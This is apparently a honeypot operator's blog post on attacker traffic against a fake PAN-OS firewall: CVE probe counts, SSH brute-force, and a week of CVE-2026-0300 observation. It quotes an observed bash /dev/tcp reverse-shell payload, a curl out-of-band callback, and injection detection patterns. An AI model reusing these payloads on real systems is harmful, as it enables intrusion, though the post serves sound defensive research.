← Back to Honeypot Data

Live observations — updated 13 May 2026 — CVE-2026-0300 patch day April–May 2026

Palo Alto Honeypot — How Fast Do Attackers Find Your Firewall?

We deployed a high-fidelity Palo Alto PAN-OS honeypot across three sensors and waited. In the first two weeks, 440+ unique source IPs probed the management interface, captive portal, GlobalProtect VPN, and XML API — producing nearly 47,000 events. The original post asked whether the five monitored CVEs would ever attract real exploit traffic. They did: 90 CVE-exploitation attempts have now been observed. In May 2026, a new vulnerability — CVE-2026-0300, an unauthenticated captive-portal buffer overflow — added a seventh observation window. We tracked attacker behaviour for seven days ahead of the vendor patch.

Palo Alto PAN-OS GlobalProtect Firewall Honeypot CVE-2024-0012 CVE-2024-3400 CVE-2026-0300
Total Events
46,800+
Unique Sources
440+
SSH Login Attempts
17,000+
Sensors
3
Services
5
CVE Attempts
90

What We Deployed

The honeypot presents itself as a Palo Alto PAN-OS firewall management interface, complete with five distinct services that real PAN-OS devices expose:

Service What It Mimics What We Capture
Management WebUI PAN-OS login page with model/version footer Credentials, CVE exploitation attempts, recon patterns
GlobalProtect VPN Portal and gateway with prelogin/login endpoints VPN credentials, client metadata, SESSID abuse
XML API Full API with keygen, operational commands, config API key generation, config read/write/commit attempts
SSH CLI Interactive PAN-OS shell with show/configure commands Full command history, config changes, credentials
Captive Portal Network authentication redirect page Portal credentials, redirect URL analysis

Each instance has a unique identity — different model, serial number, TLS certificate, and PAN-OS version — so no two sensors share fingerprints visible to scanners.

CVE Detection — What We’re Watching For

Palo Alto firewalls have been the target of multiple critical vulnerabilities in 2024–2025. Our honeypot detects exploitation attempts for five actively exploited CVEs:

CVE CVSS Attack Vector Detection Method
CVE-2024-3400 10.0 SESSID cookie path traversal on GlobalProtect Regex on SESSID for ../ and ${IFS}
CVE-2024-0012 9.8 Authentication bypass via X-PAN-AUTHCHECK header Header value check on all requests
CVE-2021-3064 9.8 HTTP smuggling on GlobalProtect CL+TE header mismatch detection
CVE-2025-0108 8.8 Path confusion via double-encoded traversal Detect %2e%2e after URL decode on /unauth/
CVE-2024-9474 7.2 Command injection in user parameter Regex on user field for backticks and $()
CVE-2026-0300 (NEW) Critical Unauthenticated stack buffer overflow in captive-portal /php/uid.php and /php/login.php endpoints 11 custom Suricata rules (SIDs 9026300–9026310) — oversize body, A-run, shellcode patterns, self-doxxing UA; see § below

CVE Exploitation — What We Actually Saw

The original version of this post said “no CVE exploits observed yet.” That is no longer true. After two weeks of internet exposure across both sensors, the honeypot has captured 90 distinct CVE-exploitation attempts against four of the five monitored CVEs:

CVE Generic cve_attempt hits CVE-specific rule hits Notes
CVE-2024-0012 27 By far the most-attempted CVE — X-PAN-AUTHCHECK header probes
CVE-2024-3400 7 SESSID path traversal — attackers know the GlobalProtect endpoint
CVE-2025-0108 6 Double-encoded path confusion under /unauth/
CVE-2024-9474 5 Command injection in user parameter
CVE-2021-3064 0 CL+TE smuggling not observed yet
Generic paloalto_cve_attempt rule (any of above + heuristics) 90 45 Total signal — double-counts events that hit both a generic and a specific rule

CVE-2024-0012 leading the table is consistent with reports from Censys, Greynoise, and Palo Alto’s own Unit 42 advisories — the X-PAN-AUTHCHECK auth-bypass is trivially scriptable and indexes well in scanner playbooks. By contrast we have not seen a single CVE-2021-3064 attempt: HTTP smuggling requires a more delicate request-pair and isn’t a fit for spray-and-pray scanning.

What Attackers Do When They Find Your PAN-OS

Two weeks of observation across both sensors makes the reconnaissance pattern much clearer than the early-snapshot version of this post. The four phases are still recognisable but the volumes have grown an order of magnitude:

PHASE 1 Discovery & Path Probing (713 events)
Scanners hit random paths looking for known web applications. They don’t know it’s a Palo Alto yet — they’re spraying common paths like /favicon.ico, /.well-known/, /robots.txt, and framework-specific paths. Most return 404 and move on. Tagged as PANOS_PROBE + PANOS_RECON.
PHASE 2 Captive Portal Interaction (430 events)
HTTP requests to port 6080 get redirected to the captive portal login page. Automated scanners follow the redirect and discover an authentication form. Some attempt to submit credentials through the portal — indicating they recognise it as a network access control point. PROD2 (the public-facing OVH sensor) captured the bulk of this traffic; the LAN sensor sees less because the captive portal port isn’t directly DNAT’d.
PHASE 3 Login Page Access & CVE Probing (135 events)
Targeted scanners find the management login at /php/login.php. At this point they know it’s PAN-OS — the page title, CSS structure, and PHPSESSID cookie confirm it. Some immediately attempt admin/admin default credentials. This is also where the bulk of the CVE-attempt traffic lands — X-PAN-AUTHCHECK header probes and double-encoded path-traversal under /unauth/. Tagged PANOS_ACCESS, PANOS_CVE, PANOS_CVE_2024_0012.
PHASE 4 Credential & SSH Brute-Force (44,800+ events)
Once identified as PAN-OS, the attack volume explodes — 27,830 SSH connection attempts plus 16,941 credential submissions on the CLI port. Web-side, attackers also try API key generation via /api/?type=keygen and GlobalProtect prelogin enumeration. The SSH brute-force never stops: it averages roughly 2,000 attempts per day from hundreds of distinct sources.

SSH CLI — What Happens After Login

Our SSH honeypot on port 2200 accepts all credentials and presents an interactive PAN-OS shell. Over 1,000 SSH sessions were recorded, with attackers running reconnaissance commands and attempting configuration changes:

Event Type Count Severity Attacker Goal
SSH session opened 27,830 LOW Pure connection attempts (banner grab + drop)
SSH credential submission 16,941 MEDIUM Credential stuffing / brute force
Default-credential pair (admin/admin etc.) 317 MEDIUM Out-of-the-box config probing
show system info 18 LOW Version fingerprinting
configure mode 8 HIGH Persistence — enter config mode
set / delete (config write) 4 CRITICAL Configuration tampering
commit 4 CRITICAL Apply configuration changes
request system restart 3 CRITICAL Disruption — reboot attempt
debug commands (priv-esc surface) 6 HIGH Internal-state inspection

PAN-OS vs FortiGate — Attack Pattern Comparison

We run both PAN-OS and FortiGate honeypots on the same sensors. The attack patterns differ significantly:

Metric FortiGate PAN-OS
Time to first scan Minutes Minutes
Primary attack CVE-2022-40684 (auth bypass) Credential stuffing + API probing
VPN targeting SSL VPN login spray GlobalProtect prelogin enumeration
SSH component Not available Full CLI with config mode tracking
CVE exploitation Active (CVE-2022-40684 common) Active (90 attempts on 4/5 CVEs — CVE-2024-0012 leads)

Key Findings

  • PAN-OS management interfaces are found within minutes. Internet-wide scanners actively probe for the distinctive PAN-OS HTTP fingerprint (empty Server header, PHPSESSID cookie, PHP-era Expires date).
  • SSH brute-force is overwhelmingly dominant. 17,000+ credential submissions on port 2200 in two weeks, sustained at ~2,000/day from hundreds of unique sources — orders of magnitude more than every web-side attack combined.
  • CVE-2024-0012 is what scanners actually try. X-PAN-AUTHCHECK header probes (27 hits) far outpace the other monitored CVEs. CVE-2024-3400 (7) and CVE-2025-0108 (6) follow at much lower rates. CVE-2021-3064 (HTTP smuggling) was not seen at all — spray-and-pray scanners avoid attacks that need careful request-pair construction.
  • The captive portal is an unexpected attack surface. Ports 6080/6082 attracted 430 events — more reconnaissance traffic than the management web UI itself. Attackers treat any authentication form as a target.
  • API enumeration happens quickly. Within hours of deployment, scanners discovered /api/?type=keygen and attempted credential-based API key generation. We have observed 14 API config-read attempts and 9 API config-write attempts.
  • The two-sensor split tells the deployment-context story. The internet-facing OVH sensor (PROD2) sees SSH credential traffic from 439 unique sources; the LAN-side DEV sensor sees the same traffic via firewall DNAT but at much higher absolute volumes (39K events) because the DNAT exposes the SSH and web ports to the wider internet for longer.

CVE-2026-0300 — Captive Portal Buffer Overflow: 7-Day Live Observation

On 2026-05-06 Palo Alto Networks disclosed CVE-2026-0300 — an unauthenticated stack buffer overflow in the User-ID captive-portal component of PAN-OS, reachable on the dedicated captive-portal ports (TCP 4443, 6080, 6081, 6082) without any credential. We already had captive-portal ports live on all three sensors. We wrote 11 custom Suricata detection rules (SIDs 9026300–9026310) on disclosure day and tracked the pre-patch operator pool for seven days until the vendor patch landed on 2026-05-13.

The short version: the actual CVE attack shape — oversize POST body to /php/uid.php with buffer-overflow padding — was never observed in the wild on our sensors during the seven-day window. What we did observe was more revealing about how operators behave in the days between a disclosure and its patch.

The vulnerability

The affected endpoints (/php/uid.php, /php/login.php, /php/captiveportal.php) are served on separate TCP ports that are exposed by default when the captive-portal feature is enabled — independent of whether the management WebUI is internet-accessible. A single unauthenticated POST with a sufficiently large body can overflow a stack buffer in the C-based User-ID backend. No authentication, no prior session, no special headers required. Proof-of-concept code (qassam-315, p3Nt3st3r-sTAr) was public on disclosure day.

Operators we observed — by behaviour, not by name

Date (CEST) Operator type Technique SID fired Assessment
2026-05-06 Scanner (FPT Vietnam) Self-doxxing UA: Mozilla/5.0 (CVE-2026-0300-Checker) 9026307 Exposure inventory, not exploit. Declared the CVE in the User-Agent string.
2026-05-10 Exploitation attempt (DE-hosted) 2120-byte A-run preamble then POST /php/login.php with bash reverse-shell body: bash -i >& /dev/tcp/…/443 0>&1 9026305, 9026306 Real exploit attempt. Only one seen across 7 days, no follow-up. Suricata initially mis-classified the flow as TLS — the TCP-layer rules (9026305, 9026306) caught it regardless.
2026-05-11 Exposure survey (US hosting) 355 events / 65 min, UA: panos-cve-2026-0300-exposure-survey/1.0. Probed /php/uid.php specifically (correct CVE endpoint, unlike public PoCs which target /php/login.php). 9026307 Sophisticated recon: correct endpoint, self-identifying UA, brief burst then gone. One brief return burst the next day, then permanently silent.
2026-05-11–12 Generic fuzzer (OVH VPS) 927 events over 9 hours; hybrid probe: i386 ROP-shaped pointer chain + {curl,http://<interactsh>} OOB callback + 518-byte A-run query string. Nuclei template set. 9026305, 9026310 Not CVE-2026-0300-specific — a kitchen-sink Nuclei run against any captive-portal surface. The OOB token links it to ProjectDiscovery tooling. Noteworthy: 9026305 correctly fired despite the GET-not-POST shape.
2026-05-06–12 Coordinated scanner clusters Two /24 clusters active throughout the window: China-Mobile-allocated /24 (14 distinct IPs) and Aeza International /22 (26+ IPs). TLS fingerprint-only, no POST body, no CVE-aware UA. none Background recon layer. China-Mobile /24 went silent at 20:00 CEST patch eve. Aeza continued.

The detection engineering story

We iterated the rule set across all seven days as we observed new evasion shapes. Three additions were driven by real traffic, not theory:

Patch day outcome

On 2026-05-13 the vendor patch released. By evening, zero HONEYLENS SID firings across all three sensors. Zero oversize POST bodies. Zero shellcode. Every tracked exploitation-intent IP was absent. The China-Mobile /24 cluster — the most consistent presence across all seven pre-patch days — made a final burst on patch eve at 18:00 CEST and went silent.

What replaced them: Censys cataloguing /php/login.php in its crawl template (will continue indefinitely), a Dshield-listed /24 doing a Citrix/VPN-appliance sweep across all three sensors in sequence, and routine TLS fingerprinters. The exploitation-active population withdrew cleanly at patch time.

The CVE-specific exploit rules (9026300–9026304) never fired on real traffic across seven days. The actual BoF attack shape — a correctly-formed oversize POST to the vulnerable User-ID endpoint — was not observed in the wild on our sensor surface during the pre-patch window. Whether that reflects targeted (non-internet-visible) exploitation or operators holding PoCs until after patch analysis, we cannot say.

Observation days
7
Custom rules written
11
HONEYLENS SID firings
~12
Exploit-shape POSTs
0
Self-doxxing operators
2
Real exploit attempts
1

Data captured by HoneyLens sensor network across 3 deployment sites between 12 Apr and 13 May 2026. The PAN-OS honeypot implements 6 CVE detections (5 original + CVE-2026-0300) with 33 distinct attack-type classifications plus 11 custom Suricata rules for the captive-portal BoF surface. Each instance uses a unique identity (serial, TLS certificate, hostname) to prevent cross-sensor fingerprint correlation.